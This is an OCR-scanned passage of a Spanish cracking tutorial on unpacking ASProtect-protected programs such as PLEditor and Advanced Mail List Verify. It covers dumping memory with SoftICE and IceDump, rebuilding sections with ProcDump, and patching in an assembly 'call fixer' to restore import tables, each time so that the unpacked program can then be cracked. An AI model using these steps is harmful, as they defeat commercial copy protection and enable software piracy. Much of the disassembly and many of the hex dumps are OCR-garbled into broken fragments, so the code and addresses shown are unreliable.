del tutorial que habla de ello), desencripta ciertas cosas para tener la API. Pero lo hace cuando el programa tiene necesidad de esta API. Así 
pues, la idea es de añadir esta parte al programa, el cual la vuelca al llegar a la zona C7xxxx. Para hacer esto, es necesario saber donde 
comienza esta zona y donde termina. Se observa con el Softlce y se ve (entre zonas de memoria no válidas) que comienza en C70000 y 
termina en C78000. Por consiguiente, se puede volcar esta zona utilizando el IceDump (extensión del Softlce) y haciendo: pagein d c70000 
8000 c:Mmport.dat. Se obtendrá así un volcado de esta zona en el fichero import.dat. 

Sin embargo, no hay que precipitarse y volcar el programa directamente. En efecto, si se analiza esto más de cerca y se deja desarrollar el 
programa, se puede ver que cuando llama a la zona C7xxxx, hace asimismo llamada a otra zona. He aquí un ejemplo: 


:00C74C32 0000 ADD [EAX],AL 

:00C74C34  1E PUSH DS 

:00C74C35 0000 ADD [EAX],AL 

:00C74C37 006842 ADD [EAX+42] ,CH 

:00C74C38  68424CC700 PUSH 00C74C42 

:00C74C3D E84A048EFF CALL 0055508€ <-= llama a una zona en memoria 55508C 
:00C74C42 7A2C JP 00C74C70 

:00C74C44  C7009A2CC700 MOV DWORD PTR [EAX],00C72C9A 

:00C74C4A  C7002A560000 MOV DWORD PTR [EAX],0000562A 

:00C74C50  1E PUSH 


Se puede ver que utiliza una zona de memoria situada en 55508C. Ésta corresponde al lugar en el que Asprotect se descomprime. Por 
consiguiente, para que el programa funcione, la zona de Asprotect debe también estar presente. Es necesario pues, volcarla también. En este 
momento se puede ver toda la zona entre zonas de memoria no válidas, pero aquí cierta parte aún no es válida, por lo que hay que observar 
con cuidado. Esta zona se extiende entre 520000 y 567000, es necesario volcarla como sigue: pagein d 520000 47000 enddasprotect.dat. 
Ahora tenemos la zona de Asprotect en el fichero asprotect.dat. 

Se puede ahora pasar al volcado del programa propiamente dicho. A la altura del POPAD se hace a eip para modificar la instrucción y se 


pone jmp eip para que el programa entre en un bucle sin fin. Inmediatamente pulsamos ES para salir del programa y sólo resta hacer un 
volcado completo sobre el objetivo que está en memoria. 


2) Reconstrucción del volcado 


Ahora con todo esto hay que reconstruir un ejecutable válido. Anteriormente, yo utilizaba un método poco detallado y muy complicado. Un 
día TeeJi me preguntó por qué lo hacía de aquel modo en vez de utilizar las secciones. No lo dudé un instante, lo hice así y fue mucho más 
simple. 


Bien, antes que nada, hay que hacer una pequeña manipulación. Hay que copiar la sección de Asprotec (la que corresponde a la que está ya 
en el fichero) del programa de origen (el protegido) a nuestro volcado. Debe hacerse así porque la tabla de importación (la que utiliza 
Asprotect) está estropeada y no se puede utilizar el programa volcado. Para saber donde está el principio de esta zona, se busca con un editor 
hexadecimal la cadena "90 60 E8 01 00 00 00 90 5D" que siempre es el inicio de la zona de Asprotect. Se copia desde aquí hasta el final del 
programa, y se la coloca en el lugar de la del programa volcado (se busca la misma cadena en éste para encontrar el inicio). 


A continuación hay que unir al programa los otros dos volcados que se han hecho. Sin embargo, hay que ponerlos en las zonas de memoria 
donde se encontraban. Para esto, se debe utilizar ProcDump, ir a PE Editor y se abre nuestro programa volcado. A continuación, en Sections 
se hace Add section y se añade una sección de las siguientes características 


Name: .aspr  V.Size: 00047000  V.Offset: 00120000 Raw Size: 00047000 R.Offset: 00115400  Charac.: E0000020 


Esta es la sección para el fichero asprotect.dat. Se le da un virtual offset de 120000 (más la image base, 520000) para que se encuentre en un 
buen lugar de la memoria. El tamaño del volcado es de 47000h, así pues se pone 47000, el real offset lo da ProcDump y las características se 
pueden cambiar, aunque no es obligatorio. A continuación se añade la sección para el fichero import.dat: 


Name: .import  V.Size: 00008000  V.Offset: 00870000 Raw Size: 00008000  R.Offset: 0015C400  Charac.:E0000020 


La misma explicación que para el anterior. No hay que olvidar cambiar el tamaño de la imagen. Yo no me preocupo de ello, porque utilizo 
Procinfo (de TeeJi) que lo hace en mi lugar. Pero vosotros debéis hacerlo tomando los tamaños de las secciones añadidas y el tamaño de la 
imagen. 


Ahora que se ha hecho esto, se ha de tomar el editor hexadecimal, se abre el fichero asprotect.dat y se copia todo. Se inserta esto al final del 
volcado de PLEditor. A continuación se hace lo mismo con el fichero import.dat. Se salva el volcado y se cambia el valor de EIP (el 
contenido en EAX a la altura del POPAD), aquí se hace 4B327C-400000 (image base)= B327C. Así pues, el nuevo valor de EIP será B327C. 
Se cambia con el editor hexadecimal o con el ProcDump. 


Ahora se coge el volcado y se ejecuta. Tranquilos O . Resulta que nuestro volcado es ejecutable. Ya no nos queda más que crackear el 
volcado... 


IV_2"método: Advanced mail list verify 2.0 


No habiendo tenido éxito utilizando el método precedente sobre AMV, os voy a presentar un método que Tsehp ha utilizado sobre 
Commview. Tened en cuenta que este método no funciona con PLEditor (Tsehp lo ha cambiado: ver parte 4). Este método es utilizado 
especialmente con Cdilla: es lo que se llama un "call fixer". Permite poner las direcciones de las APIs (y de las funciones) en la tabla de 
importación (en la IAT). Así, no se tendrá siempre una IAT y una tabla de importación correcta en el verdadero sentido del término, pero no 
hará falta volcar la parte de la tabla de importación y la parte de Asprotect. 


Veamos como se presentan las secciones del programa: 


Name V. Size V. Offset Raw Size R. Offset Charact. 
.text 00028000 00001000 00012200 00001000 C0000040 
.rdata 00003000 00029000 00000C00 00013200 C0000040 


.data 0000D000 0002C000 00001400 00013E00 C0000040 


.TSsrc 00029000 00039000 00019000 00015200 C0000040 
.data 00015000 00062000 00014E00 0002E200 C0000040 
.data 00001000 00077000 00000000 00043000 C0000040 


Aquí no hay sección .idata, pero sí hay una sección .rdata en la cual se hubiera encontrado la tabla de importación del programa 
descomprimido (si existiera). Hay que poner en ella un breakpoint dirigido al inicio de la sección (cuando va a escribir): bpm 429000 w. A 
continuación hay que tracear como antes (no lo explico de nuevo, ya que el proceso es idéntico) hasta el principio de la zona tres de 
Asprotect. Se procede de la misma manera con el debugger, y el SoftIce actúa igualmente en el breakpoint de escritura al principio de la zona 
.rdata. Nos encontramos esta vez que toda la parte de la import table está comprendida entre DEO000 y DE4000. Retiramos el breakpoint y 
traceamos hasta el final (igual que antes, excepto los dobles calls que no están). Se pasa a continuación al inicio del programa: 


015F:00421C12 64892500000000 
015F:00421C19 83EC58 


FS: [00000000],ESP 
ESP, 58 


015F:00421BFB  C3 RET 
015F:00421BFC 55 PUSH EBP <-- inicio del programa 
015F:00421BFD 8BEC MOV EBP, ESP 
015F:00421BFF  6AFF PUSH FF 
015F:00421C01 6860944200 PUSH 00429460 
015F:00421C06 68985B4200 PUSH 00425B98 
015F:00421C0B  64A100000000 MOV EAX,FS: [00000000] 
015F:00421C11 50 PUSH EAX 
MOV 
SUB 


De paso, aprovechamos para tomar nota de que el EIP es de 421BFC. Continuamos traceando hasta llegar aquí: 


015F:00421C19 83EC58 SUB ESP, 58 

015F:00421C1C' 53 PUSH EBX 

015F:00421C1D 56 PUSH ESI 

015F:00421C1E 57 PUSH EDI 

015F:00421C1F 8965E8 MOV [EBP-18],ESP 

015F:00421C22 FF1574914200 CALL [00429174] <-- interesante 
015F:00421C28  33D2 XOR EDX, EDX 

015F:00421C2A 8AD4 MOV DL, AH 

015F:00421C2C  8915B86B4300 MOV [00436BB8],EDX 

015F:00421C32 8BC8 MOV ECX, EAX 


Aquí está lo que había explicado antes para PLEditor. Llama a lo que se encuentra normalmente en la tabla de importación (aquí en 429174 
al inicio de la sección .rdata) y en 429174, se encuentra DE2464. Así pues, llama a lo que hay en DE2464: 


015F:00DE2464 E993091BBF JMP KERNEL32!GetVersion 
015F:00DE2469 1B00 SBB EAX, [EAX] 
015F:00DE246B 000E ADD [ESI],CL 
015F:00DE246D 0000 ADD [EAX],AL 
015F:00DE246F  00E9 ADD CL, CH 

015F:00DE2471 37 AAA 

015F:00DE2472 Al11ABF1BO00O MOV EAX, [001BBF1A] 


Y en DE2464, hay este salto a una API. He aquí como reencuentra sus funciones. Pero esto no es todo, ya he dicho que el programa se 
desencripta sobre la marcha. Continuamos traceando y llegamos a un lugar interesante (hay que buscar siempre un CALL [429xxx] ): 


015F:0040B8DB 51 PUSH ECX 

015F:0040B8DC 52 PUSH EDX 

015F:0040B8DD FF1508904200 CALL [00429008] <--= un call interesante 
015F:0040B8E3  85C0 TEST EAX, EAX 

015F:0040B8E5 7408 JZ 0040B8EF 

015F:0040B8E7 8B44241C MOV EAX, [ESP+1C] 

015F:0040B8EB 33F6 XOR ESI,ESI 

015F:0040B8ED 8907 MOV [EDI] ,EAX 


¿Por qué este CALL [00429xxx] es más interesante que los otros? Veamos lo que hace a continuación: 


015F:00DE2A14 681E2ADE00 PUSH 00DE2A1E <-- se llega aquí si se entra en el 
call 

015F:00DE2A19 E816246DFF CALL 004B4E34 <-- llamada a una parte de Asprotect 

015F:00DE2A1E  851F TEST [EDI] ,EBX 

015F:00DE2A20 DEOO FIADD WORD PTR [EAX] 

015F:00DE2A22 AE SCASB 

015F:00DE2A23  1F POP DS 

015F:00DE2A24 DEOO FIADD WORD PTR [EAX] 

015F:00DE2A26 DE0OO FIADD WORD PTR [EAX] 


Se va a la misma zona de memoria que antes, pero no hace el JMP API, sino CALL 004B4E34. Es una parte que está en la zona de 
Asprotect. Aquí se encuentra el call que sirve para desencriptar las APIs. Es muy importante, hay que tomar nota de este punto. 


Ahora se vuelve a empezar, se evita el cambio de dirección, se pasa la descompresión y se llega a la tercera zona; se elude el anti-debugger, 
sin olvidar colocar nuestro bpm 429000 w. Normalmente, el Softlce deberá detenerse sobre el REPZ MOVSB de antes, allí donde copiaba 
ceros. Pero esta vez pulsaremos F5 para continuar. El Softlce debería detenerse aquí: 


015F:004B5138 87FE XCHG EDI,ESI 

015F:004B513A AC LODSB 

015F:004B513B 08C0 OR AL,AL 

015F:004B513D 74E4 JZz 004B5123 

015F:004B513F 4É DEC ESI 

015F:004B5140 56 PUSH ESI 

015F:004B5141 53 PUSH EBX 

015F:004B5142  80F802 CMP AL, 02 

015F:004B5145 7407 JZ 004B514E 

015F:004B5147 0FB64E01 MOVZX ECX,BYTE PTR [ESI+01] 
015F:004B514B 41 INC ECX 

015F:004B514C  EBO5 JMP 004B5153 

015F:004B514E  B904000000 MOV ECX, 00000004 

015F:004B5153 41 INC ECX 

015F:004B5154 01CE ADD ESI,ECX 

015F:004B5156 E8B5EFDEFFEFF CALL 004B4F10 <-- busca las APIs 
015F:004B515B AB STOSD 

015F:004B515C  EBDC JMP 004B513A <-- vuelve al inicio 
015F:004B515E 61 POPAD 


Y aquí entra en un bucle. Si se mira, se puede ver en EDI valores del tipo 429004. A grandes rasgos, esta rutina se utiliza para escribir en la 
tabla de importación normal (en 429000) las referencias a la tabla de importación en DEOO00O. Pues aquí la idea es que el programa no 
escriba en 429000 las referencias a la zona en DEOOOO, sino que ponga directamente las direcciones de las APIs que serán utilizadas. Es por 
esta razón que antes hemos buscado el CALL 4B4E34 que sirve para desencriptar las direcciones de las APIs. 

Es pues aquí, donde va a ponerse el call fixer. Tened en cuenta que si os da pereza, Tsehp propone encontrar el CALL 4B4E34 haciendo s 0 1 
ffÉfFfEf "55 Sb ec c4 f8 fe ff". Este bucle, se puede encontrar con s 0 1 f£ffffff "ac 08 c0 74 e4'. Pero es conveniente saber de donde proceden 
estos datos. 

Ahora es necesario escribir un call fixer antes de que se ejecute este bucle. Es aquí donde hay que darle las gracias a Tsehp O . En efecto él 
propuso este método sobre el programa Commview. He aquí el principio: 


015F:004B514E B904000000 MOV ECX, 00000004 

015F:004B5153 41 INC ECX 

015F:004B5154 01CE ADD ESI,ECX 

015F:004B5156 E8B5EFDFFFF CALL 004B4F10 <-- hay que desviarse aquí 
015F:004B515B AB STOSD 

015F:004B515C  EBDC JMP 004B513A <-- salto al inicio del bucle 


Lo que hay que hacer es desviarse a la altura del call y buscar un espacio libre en memoria (con ceros) para desviar el call y añadir nuestro 
código. Lo he desviado a 4B6500: 


015F:004B5147 0FB64E01 MOVZX ECX,BYTE PTR [ESI+01] 
015F:004B514B 41 INC ECX 

015F:004B514C  EBO5 JMP 004B5153 

015F:004B514E  B904000000 MOV ECX, 00000004 

015F:004B5153 41 INC ECX 

015F:004B5154 01CE ADD ESI,ECX 

015F:004B5156 E9A5130000 JMP 004B6500 <-- nos desviamos 
015F:004B515B AB STOSD 

015F:004B515C  EBDC JM 004B513A 

015F:004B515E 61 POPAD 


Y en 4B6500 se coloca el call fixer que Tsehp nos propone (thx man O ). He aquí lo que él propone como call fixer: 


190000 call 18a2f4 ; we use the legal call 

190005 cmp ecx, 40000000 ¿ ecx contains an api address ? 

19000b jle 19001c ¿ 1f not 

19000d add ecx, eax ; 1f yes convert the address***case 2 

19000f£ add ecx,5 ; to the absolute api address for a normal import table 
190012 mov dword ptr [edi],ecx ¿ put it in import table, pointed by edi 

190014 add edi, 4 ; updates edi to the next import 

190017 3jmp l1l8a5le ; back to normal 

19001c cmp ecx,0 ; is it case 4 ? 

19001f 3z 19002e 

190021 cmp eax, 40000000 ¿ €eax contains an api address ? 

190026 jle 19003c ; 1f not go to 19003c 

190028 stosd ¡ We're in case 1, direct copy of valid api address in import 
table 

190029 jmp 1l8a5le ; back to normal 

19002e push dword ptr [eax+1] ¿ we're in case 3, pushes the encrypted api address 
190031 call 16df80 ¡ IMPORTANT 


you have to locate this aspack address by doing a S 0 L FFFFFFFF 55 8b ec 81 c4 f8 fe ff ff 53 
56 

so we found as example 16df80, you MUST modify the code at offset 16df80+95 with three nops 
(90), if you don't 

this call will generate an error 13 in aspack (the call doesn't return properly) 

this call is used to decypher the encrypted api address, normally decrypted at run time 


190036 stosd ; the api's address is then decrypted, copy it to import 
table 

190037 jmp l8a5le ; back to normal, don't forget that this is the loop back 
jump 

19003c mov eax, KERNEL32!GetProcAddress ; use softice to have your system's getprocaddress. 
this is case 4 

190041 stosd ¿ copy to import table 

190042 jmp l1l8a5le ; back to normal 


Está bien, pero aquí el call fixer no va a funcionar. Será necesario modificarlo, especialmente a la altura del CMP ECX, O que impida pasar 
por el CMP EAX, 40000000. Pero antes que esto, queda una cosa que impediría que funcionase. No nos preocupemos por el momento de la 
tabla de importación y hagamos el volcado del programa (como anteriormente, pero esta vez sólo del programa). Analicemos el volcado que 
hemos obtenido y veamos especialmente el inicio de la sección .rdata: 


00029000 DC29 DEOO F829 DEOO 142A DEOO 302A DEOO .)...)...*..0*%.. 
00029010 4C2A DEOO 682A DEOO 842A DEOO A02A DEOO L*..h*...*...*.. 
00029020 BC2A DEOO 0000 0000 482B DEOO 542B DEOO .*...... Fale OSA KE IP 
00029030 602B DEOO 6C2B DEOO 782B DEOO 842B DEOO "+..1+..x+...+.. 
00029040 0000 0000 4228 F2BF FE24 F2BF D824 F2BF ....B(...S...S.. 
00029050 3A28 F2BF 8A28 F2BF 9322 F2BF 3551 F2BE :(...(..."..50.. 
00029060 144A F2BF 7B50 F2BF 8D14 F2BF 7F26 F2BF .J..[(P....... E-.. 


00029070 0000 0000 7021 DEOO 7C21 DEOO 8821 DEOO ....p!l..|!...!.. 


00029080 9421 DEOO A0O21 DEOO AC21 DEOO B821 DEOO .!l...!l...!...l.. 
00029090 C421 DEOO DO21 DEOO DC21 DEOO E821 DEOO .!l...!l...!l...l.. 
000290A0 F421 DEOO 0022 DEOO 0C22 DEOO 1822 DEOO .!..." y , 
000290B0 2422 DEOO 3022 DEOO 3C22 DEOO 4822 DEOO $"..0"..<",.,H" 
000290C0 5422 DEOO 6022 DEOO 203D 4B00 6C22 DE0OO T"..'" =K.1" 
000290D0 7822 DEOO 8422 DEO0O 9022 DEOO 9C22 DEOO x" y " " 
000290E0 A822 DEOO B422 DEO0O C022 DEOO CC22 DEOO ." Hi Y ys 


Se ven claramente las referencias a la zona DExxxx. Pero en 290C8 (4290C8 en la memoria) se encuentra 4B3D20, que forma parte de la 
sección de Asprotect. ¿Por qué pone un vínculo con esta zona aquí? Para saberlo hay que relanzar el programa (se retira el cambio de 
dirección y el anti-debugger) y se pone un breakpoint en 4B3D20: bpm 4b3d20 x. Normalmente, el Softlce aparecerá aquí: 


015F:004B3D1F C3 RET 

015F:004B3D20 55 PUSH EBP 

015F:004B3D21 8BEC MOV EBP, ESP 

015F:004B3D23 8B550C MOV EDX, [EBP+0C] 

015F:004B3D26  8B4508 MOV EAX, [EBP+08] 

015F:004B3D29 3B0584B64B00 CMP EAX, [004BB684] <-- EAX= -1 ? 

015F:004B3D2F 7509 JNZ 004B3D3A <-- no salta 

015F:004B3D31 8B0495E0B64B00 MOV EAX, [EDX*4+004BB6E0] <-- se pone 4B3DA8 en EAX 

015F:004B3D38 EBO7 JMP 004B3D41 <-- se vuelve al programa 

015F:004B3D3A 52 PUSH EDX 

015F:004B3D3B 50 PUSH EAX 

015F:004B3D3C  E83739FFFF CALL KERNEL32!GetProcAddress <-- sino se recupera 
la dirección que quiere 

015F:004B3D41 5D POP EBP 

015F:004B3D42 C20800 RET 0008 <-- se vuelve al programa 

015F:004B3D45 8D4000 LEA EAX, [EAX+00] 

015F:004B3D48 55 PUSH EBP 


Interesante ¿no? Pues en nuestro call fixer habrá que tener en cuenta el hecho de que EAX puede ser igual a 4B3D20. El programa llama 
muchas veces a esta rutina, pero no pone más que una vez 4B3DAS8 en EAX. Además, testeando el programa, se ve que en ningún momento 
llama a lo que hay en 4B3DAS (quizá sirve para desencriptar una región del programa, pero aquí se necesitaría una clave, en fin, no sé para 
que sirve esta parte). A continuación de nuestro volcado será necesario poner también esta rutina, y visto que el programa no utiliza lo que 
hay en 4B3DAS, yo no lo he puesto (de todos modos habría sido mucho más complicado, pero creo que se utiliza para desencriptar una parte 
del programa si se tiene una clave). 

Bien, ahora se puede rehacer el call fixer para que responda a lo siguiente: 


015F:004B6500 ESOBEAFFFE CALL 004B4F10 <-- se pone el call 

015F:004B6505 81F900000040 CMP ECX,40000000 <-- ECX contiene una dir. de API 

015F:004B650B 760F JBE 004B651C <-- no salta 

015F:004B650D 03C8 ADD ECX, EAX <--= se Calcula la dirección 

015F:004B650F  83C105 ADD ECX, 05 

015F:004B6512 890F MOV [EDI],ECX <-la pone en la tabla de import. 

015F:004B6514 83C704 ADD EDI, 04 <-- se aumenta EDI para la 

siguiente importación 

015F:004B6517 E91EECFFFE JMP 004B513A <-- bucle 

015F:004B651C 3D00000040 CMP EAX,40000000 <-- EAX contiene una dir. de API 

015F:004B6521 7606 JBE 004B6529 <-- no salta 

015F:004B6523 AB STOSD <-- copia la dirección de la tabla de import. 

015F:004B6524 E911ECFFFE JMP 004B513A <-- bucle 

015F:004B6529  3D203D4B00 CM EAX,004B3D20 <-- EAX = 4B3D20 

015F:004B652E 7506 JNZ 004B6536 <-- no salta 

015F:004B6530 AB STOSD <-- copia en la tabla de import. 

015F:004B6531 E904ECFFFE JM 004B513A <-- bucle 

015F:004B6536  83F900 CM ECX, 00 <--= ECX = 0 

015F:004B6539 750E JNZ 004B6549 <-- no salta 

015F:004B653B FF7001 PUSH DWORD PTR [EAX+01] <-- se pone en la pila la 
la referencia a la dirección de la API 

015F:004B653E E8F1ESFFFE CALL 004B4E34 <-- Call de desencriptado 


015F:004B6543 AB STOSD <-- copia EAX en tabla de imp. 

015F:004B6544 E9F1EBFFFE JMP 004B513A <-- bucle 

015F:004B6549 B8AC6DF7BF MOV EAX, KERNEL32!GetProcAddress <-- sino se pone 
la dirección de GetProcAddress 

015F:004B654E AB STOSD en la tabla de importación 

015F:004B654F  E9EGEBEFFFE JMP 004B513A <-- bucle 

015F:004B6554 0000 ADD [EAX],AL 

015F:004B6556 0000 ADD [EAX],AL 


He aquí el call fixer que va a poner directamente las direcciones de las APIs en la tabla de importación. Pero para poderlo utilizar hay que 
poner alguna cosa en el CALL 4B44E34 que hemos visto y que sirve para desencriptar estas direcciones: 


004B4E34 3 Iitititidididididddd SUBRUOTINA tada rara AA 

004B4E34 

004B4E34 ; Atributos: bp-based frame 

004B4E34 

004B4E34 sub_4B4E34 proc near ; CODE XREF: .import:00DE29FD_p 

004B4E34 ; .import:00DE2A19_p 

004B4E34 

004B4E34 var_108 = byte ptr -108h 

004B4E34 var_8 = dword ptr -8 

004B4E34 var_4 = dword ptr -4 

004B4E34 arg_0 = dword ptr 8 

004B4E34 

004B4E34 push ebp 

004B4E35 mov ebp, esp 

004B4E37 add esp, OFFFFFEFSh 

004B4E3D push ebx 

004B4E3E push esi 

004B4E3F mov ebx, [ebp+arg_0] 

004B4E42 mov eax, [ebx] 

004B4E44 mov [ebp+var_8], eax 

004B4E47 lea eax, [ebp+var_108] 

004B4E4D xor ecx, ecx 

004B4E4F mov edx, 100h 

004B4E54 Call sub_4A5880 

004B4E59 mov eax, ebx 

004B4E5B mov edx, [eax+4] 

004B4E5E mov dl, [edx] 

004B4E60 cmp dl, ds:byte_4BB74C <-- ya se que está mal desensamblado 
pero bueno... 

004B4E66 jz short loc_4B4EB5 

004B4E68 mov edx, [eax+4] 

004B4E6B mov ecx, edx 

004B4E6D inc ecx 

004B4E6E mov bl, [ecx] 

004B4E70 add edx, 2 

004B4E73 mov [ebp+var_4], edx 

004B4E76 mov esi, ebx 

004B4E78 and esi, OFEFh 

004B4E7E mov ecx, esi 

004B4E80 lea eax, [ebp+var_108] 

004B4E86 mov edx, [ebp+var_4] 

004B4E89 Call sub_4A76FO 

004B4E8E mov eax, [ebp+var_8] 

004B4E91 Call sub_4A817C 

004B4E96 sub eax, 2 

004B4E99 push eax 

004B4E9A mov edx, esi 

004B4E9C lea eax, [ebp+var_108] 

004B4EA2 mov ecx, [ebp+var_8] 


0041 


004] 
0041 


0041] 
0041 


004] 
0041 


0041] 
0041 


004] 
0041 


0041 
0041 
0041 
0041 
0041 
0041 
0041 
0041 
0041 
0041 
0041 
0041 
0041 
0041 


E 
UY 
ES 


y 1loc_4B4EBÉE: 


sub_4B4E34 


sub_4B3564 


eax, 
[ebp+var_4], 


short loc_4B4EBE 


eax, [eax+4] 
eax 
eax, l[eax] 


[ebp+var_4], 


[ebp+var_4] 
[ebp+var_8] 
sub_4B4C8C 
[ebp+4], 
esi 
ebx 
esp, 
ebp 
4 


ebp 


eax 


[ebp+var_108] 


eax 


eax 


; CODE 


XREPF': 


E34+32_3 


sub_4B4 


E34+7F_3 


<-- hay que nopear esta instrucción 


Es necesario nopear la instrucción en 4B44EC9 si no, dará un error 13 y el programa se detendrá. Ahora hay que continuar traceando el 
programa (se deja que nuestro call fixer desencripte las direcciones) y se llega hasta el lugar donde el programa cede el turno a lo que está 
descomprimido en memoria. Se vuelve a encontrar el call seguido del salvado de los registros, y se entra en él. De inmediato se encuentra el 
POPAD. Allí se anota el nuevo EIP: 421BFC, y se escribe a aip y se pone JMP EIP. Se deja el Softlce (FS) y se efectúa el volcado con 
ProcDump. Atención: hay que usar la opción Don't rebuild import table o Use actual import, para el volcado. 

Ahora, como con PLEditor, es necesario cambiar el EIP con el nuevo valor, es decir 21BFC (421BFC-40000). Hay que copiar igualmente la 
sección .aspr (aquí es la penúltima sección, la .data) del original sobre la del volcado. A continuación se edita con un editor hexadecimal lo 
que hay en 4290C8. Y si hay una referencia en 4B3D20, se ha de poner en una zona libre del programa. 


Offset A OS E A 8 9 A BC D E E 
00029090 0D 0B F8 BF 56 F6 F9 BF. 15 OA F8 BF 24 2E F9 BE 
000290A0 C4 64 F7 BF 93 7B F7 BE AD 73 F7 BF 2B 0B FA BF 
000290B0 D5 6F F7 BF B4 5C F9 BF  2C 62 F9 BF FE D5 F9 BE 
000290C0 B4 20 F8 BF EF 62 F9 BF 00 70 47 00 A0 E0 F8 BF 
000290DO B3 CA F8 BF 85 7D F7 BF 65 43 F7 BF 3C 43 F7 BF 
000290E0 B8 48 F7 BF DB 6D F7 BF” 1F 6ÉE F7 BF 41 6E F7 BE 


..D¿VOU¿..B¿$.UL 
Ad" t¿st¿+.Úl 
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Hay una zona libre en 477000. Pues allí habrá que poner la rutina que se encuentra normalmente en 4B3D20: 


015F': 
015F': 
015F': 
015F': 
015F': 
015F': 
015F': 
015F': 
015F': 
015F': 
015F': 
015F': 
015F': 
015F': 


00477000 
00477001 
00477003 
00477006 
00477009 
0047700E 
0047700F 
00477011 
00477016 
00477017 
00477018 
0047701A 
0047701B 
0047701C 


B550C 
B4508 
DEFEEFFEFE 


5 
8BEC 
8 
8 


B8A83D4B00 
90 

90 
EBO7 
52 
50 

ES8BFDAFBF 


PUSH 


(5! 


BP 

EBP, ESP 

¡DX, [EBP+0C] 
EAX, [EBP+08] 
EAX, FFFFFFFF 


T 


T 


0047701A 
EAX,004B3DA8 


00477021 
EDX 
EAX 
K 


ERNEL32!GetProcAddress 


015F:00477021 5D POP EBP 
015F:00477022 C20800 RET 0008 


He aquí que normalmente el programa volcado es completamente funcional O . No falta más que crackearlo... 


También existe un método más simple para obtener las direcciones: En primer lugar, hay que hacer el volcado del programa. A continuación 
se lanza el .exe original y se ejecuta el programa import_list (lo siento, he olvidado el nombre del autor) que nos dará un fichero con las 
direcciones correctas, ahora no queda más que copiar/pegar (tendremos incluso un texto con los cambios O ). En este programa también hay 
que arreglar el problema de 4B3D20... 


De hecho, no he escogido el mejor programa para mostrar este ejemplo. En efecto, si se reinicia la máquina hay pocas probabilidades de que 
el volcado funcione, ¿por qué? porque alguna librería de Windows se carga en lugares distintos de la memoria. He aquí donde se encuentra el 
problema para este volcado: 


00029000 AA19 EABF 4416 EABF 3415 EABF D114 EABF ....D...4....... 
00029010 EA15 EABF 7D16 EABF 2B18 EABF 8717 EABF ....)...+....... 
00029020 2A17 EABF 0000 0000 97D3 7282 FE43 7082 *......... Cu CP 
00029030 F205 7582 F4DB 7182 77D8 7182 FD4E 7282 ..u...q.w.q..Nr. 
00029040 0000 0000 4228 F2BF FE24 F2BF D824 F2BF ....B(...S...S.. 
00029050 3A28 F2BF 8A28 F2BF 9322 F2BF 3551 F2BE :(...(..."..50.. 
00029060 144A F2BF 7B50 F2BF 8D14 F2BF 7F26 F2BF .J..[P....... Susi 
00029070 0000 0000 DEF7YA F7BF E250 F8BF A570 F7BE ..... PR POR, 


Hay seis direcciones seleccionadas y he aquí a lo que corresponden: 


00DE2B48->8272D397[2]=(00001028)COMCTL32.DLL!CreateToolbarEx:0017 
00DE2B54->827043FE[2]=(0000102C)COMCTL32.DLL!InitCommonControls:0011 
00DE2B60->827505F2[2]=(00001030)COMCTL32.DLL!CreateStatusWindow:0015 
00DE2B6C->8271DBF4[2]=(00001034)COMCTL32.DLL!ImageList_Replacelcon:0046 
00DE2B78->8271D877[2]=(00001038)COMCTL32.DLL!ImageList_Create:002D 
00DE2B84->82724EFD[2]=(0000103C)COMCTL32.DLL!PropertySheet:0056 


Pues para estas seis direcciones será necesario hacer una modificación. Voy simplemente a dar el principio, ya que el método de Tsehp que 
viene a continuación, hace lo mismo, pero es mejor. Estas seis direcciones sabemos a que funciones corresponden, así pues, el principio 
consiste en modificar el EIP del programa a un lugar donde se pueda poner nuestro código. Es necesario haber anotado previamente el 
nombre de la DLL y de las funciones utilizadas. Utilizando GetModuleHandle y después GetProcAddress se recupera la dirección de 
memoria y donde va a escribir su posición en la sección .rdata. Como en este caso, no habrá problema de dirección para estas funciones. No 
he explicado completamente esta parte, ya que mientras tanto, Tsehp ha puesto a punto un nuevo método de volcado... y en él comprenderéis 
de qué estoy hablando... 


V_3er método: Advanced mail... visto de otra manera 


Ahora voy a tratar de describir un método que permite obtener un volcado que funcione sobre todas las máquinas (al menos en todas las 
versiones de Windows 9x, si el volcado está hecho sobre Windows 9x; y en las versiones de NT/2000, si el volcado... en fin, veamos O ). 
Voy a presentar un método que ha sido puesto a punto por Tsehp (very good work man): podeis encontrar su ensayo original sobre 
Commview en esta dirección: http://tsehp.cjb.net en la sección news está el ensayo sobre Asprotect 1.05. Os lo digo porque el principio de 


su método (como obtener los nombres) me ha permitido elaborar a continuación el mío. Voy a intentar explicarlo con claridad, pero esto va a 
ser difícil, ya que el método en sí no es sencillo (de todos modos, cuando se sabe hacer, resulta más fácil O ) En principio, la idea es la 
siguiente: en lugar de hacer un volcado que tenga las direcciones de las funciones utilizadas, escritas en la sección .rdata (en el caso de AMV, 
o en .idata como PLEditor) lo que habrá que hacer antes que nada es recuperar el nombre de esta función (como CreateFileA), su módulo 
(como KERNEL32.DLL) y el lugar donde debe estar en la sección .rdata (o .idata) 


Es suficiente con desviar el inicio del programa hacia un extremo del código que se encargará de recuperar las direcciones de estas funciones 
y de escribirlas en la sección .rdata, así el volcado funcionará bajo todas las versiones de Windows 9x (o NT/2000 si el volcado se ha hecho 
con estas). ¿Dónde se puede hacer esto? En el mismo lugar que antes, a la altura del call fixer. ¿Por qué aquí? Es muy sencillo: en principio 
se tiene cada dirección en la sección .rdata donde se ha escrito. Pero además para hacer estos vínculos es obligado conocer de que funciones 


se trata (de hecho, es más complicado que esto). 


Ya hemos visto como se llega aquí en el capítulo precedente: 


015F': 
015F': 
015F': 
015F': 
015F': 
015F': 
015F': 
015F': 
015F': 
015F': 
015F': 
015F': 
015F': 
015F': 
015F': 
015F': 
015F': 
015F': 
015F': 


0041 
0041 
0041 
0041 
0041 
0041 
0041 
0041 
0041 
0041 
0041 


B5138 
B513A 
B513B 
B513D 
B513F 
B5140 
B5141 
B5142 
B5145 
B5147 
B514B 


0041 
0041 
0041 
0041 
0041 
0041 
0041 


B514C 
B514E 
B5153 
B5154 
B5156 
B515B 
B5s15C 


0041 


B515E 


87F1 
AC 
08C0 
74E4 
4E 
56 

53 
80F802 
7407 
0FB64E 
41 

BO5 
B904000000 
41 
01CE 
B9EDEFFEFF 
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EDI, 


ESI 


AL,AL 
004B5123 
ESI 

ESI 

EBX 
L,02 
004B5141 
ECX, BYT1 
ECX 
004B5153 
ECX,00000 


¡A 


ESI,ECX 
B4F10 


B513A 


PTR 


004 


[ESI+01] 


<-- busca las APIs 


<-- vuelve al inicio 


